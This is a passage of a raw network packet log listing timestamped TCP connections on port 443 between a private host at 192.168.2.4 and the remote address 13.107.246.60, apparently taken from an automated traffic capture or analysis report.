                                                Oct 30, 2024 00:22:48.408931017 CET58065443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.408936024 CET4435806513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.411061049 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.411099911 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.411185026 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.411393881 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.411421061 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.417412043 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.417438984 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.417527914 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.417558908 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.417633057 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.417773008 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.417828083 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.417876959 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.422815084 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.422816038 CET58064443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.422872066 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.422902107 CET4435806413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.431011915 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.431030989 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.431169987 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.431179047 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.431231976 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.431292057 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.431335926 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.431390047 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.432820082 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.432827950 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.432857037 CET58062443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.432861090 CET4435806213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.435446024 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.435458899 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.435518026 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.435539961 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.435568094 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.435616970 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.435679913 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.435688972 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.435822964 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.435847998 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.478384972 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.478859901 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.478898048 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.479295969 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.479338884 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.609918118 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.609930992 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.609977961 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.610018015 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.610085011 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.610361099 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.610394955 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.610423088 CET58066443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.610452890 CET4435806613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.613523006 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.613537073 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:48.613612890 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.613826036 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:48.613837004 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.145993948 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.146919966 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.146965981 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.147206068 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.147500038 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.147514105 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.147627115 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.147705078 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.147958994 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.147973061 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.163086891 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.163418055 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.163436890 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.163841009 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.163851976 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.197025061 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.197487116 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.197508097 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.197715044 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.197720051 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.277551889 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.277832031 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.278019905 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.278019905 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.278019905 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.278068066 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.279532909 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.279623985 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.279692888 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.279692888 CET58067443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.279735088 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.279758930 CET4435806713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.281591892 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.281688929 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.281812906 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.281927109 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.281929016 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.281949997 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.281968117 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.282036066 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.282227039 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.282239914 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.292243004 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.292342901 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.292411089 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.292594910 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.292635918 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.292663097 CET58070443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.292678118 CET4435807013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.294857979 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.294898987 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.294985056 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.295160055 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.295187950 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.331120014 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.331288099 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.331348896 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.331501007 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.331511974 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.331525087 CET58069443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.331530094 CET4435806913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.334041119 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.334068060 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.334157944 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.334328890 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.334338903 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.353296995 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.353717089 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.353728056 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.354144096 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.354147911 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.485770941 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.486026049 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.486097097 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.486229897 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.486248016 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.486259937 CET58071443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.486263990 CET4435807113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.489629984 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.489757061 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.489873886 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.490127087 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.490163088 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:49.492939949 CET58068443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:49.492964983 CET4435806813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.020452023 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.021297932 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.021358013 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.021744967 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.021778107 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.022641897 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.022934914 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.022958040 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.023269892 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.023274899 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.029206991 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.029494047 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.029512882 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.029810905 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.029822111 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.070277929 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.071274042 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.071294069 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.071542978 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.071549892 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.149667025 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.149848938 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.150032043 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.150093079 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.150134087 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.150162935 CET58072443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.150177956 CET4435807213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.153697014 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.153700113 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.153789997 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.153893948 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.153971910 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.154020071 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.154031038 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.154043913 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.154112101 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.154124975 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.154135942 CET58073443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.154141903 CET4435807313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.156487942 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.156577110 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.156677008 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.156810999 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.156838894 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.201791048 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.202125072 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.202301979 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.202301979 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.202301979 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.204655886 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.204727888 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.204822063 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.205014944 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.205046892 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.220752954 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.220824957 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.220885992 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.221128941 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.221128941 CET58074443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.221163034 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.221188068 CET4435807413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.221996069 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.222421885 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.222465992 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.222893953 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.222908020 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.223356962 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.223445892 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.223531961 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.223718882 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.223754883 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.351907015 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.351990938 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.352211952 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.352402925 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.352447033 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.352475882 CET58076443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.352490902 CET4435807613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.355117083 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.355159998 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.355249882 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.355442047 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.355465889 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.508615017 CET58075443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.508639097 CET4435807513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.882823944 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.883651972 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.883688927 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.884212971 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.884219885 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.892882109 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.893284082 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.893333912 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.893659115 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.893675089 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.964158058 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.965296030 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.965349913 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.966506004 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.966519117 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.998186111 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:50.998914957 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:50.998984098 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.000046968 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.000061989 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.012810946 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.012959957 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.013154030 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.013232946 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.013232946 CET58077443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.013269901 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.013293028 CET4435807713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.016580105 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.016638041 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.016762972 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.016978025 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.017004967 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.026731014 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.026823997 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.026913881 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.027184010 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.027184010 CET58078443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.027230024 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.027251959 CET4435807813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.029484987 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.029572010 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.029664040 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.029839039 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.029870033 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.086740017 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.087338924 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.087376118 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.087814093 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.087827921 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.443650007 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.443777084 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.443804026 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.443836927 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.443887949 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.443924904 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.444010019 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.444092989 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.444133043 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.444133997 CET58079443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.444159985 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.444178104 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.444205046 CET4435807913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.444379091 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.444425106 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.444464922 CET58081443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.444498062 CET4435808113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.445002079 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.445038080 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.445066929 CET58080443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.445081949 CET4435808013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.449402094 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.449487925 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.449582100 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450035095 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450066090 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.450143099 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450289965 CET58084443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450325966 CET4435808413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.450429916 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450440884 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.450512886 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450548887 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.450618982 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450722933 CET58086443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.450736046 CET4435808613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.768376112 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.769203901 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.769236088 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.769622087 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.769629955 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.774174929 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.774530888 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.774574995 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.774889946 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.774903059 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.902580976 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.902750015 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.902937889 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.903048992 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.903073072 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.903090000 CET58083443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.903096914 CET4435808313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.906848907 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.906877995 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.906987906 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.907202959 CET58087443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.907211065 CET4435808713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.910063982 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.910989046 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.911068916 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.911133051 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.911133051 CET58082443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.911169052 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.911199093 CET4435808213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.913726091 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.913809061 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:51.913897991 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.914062023 CET58088443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:51.914114952 CET4435808813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.187020063 CET4435808513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:22:52.187778950 CET58085443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:22:52.187792063 CET4435808513.107.246.60192.168.2.4
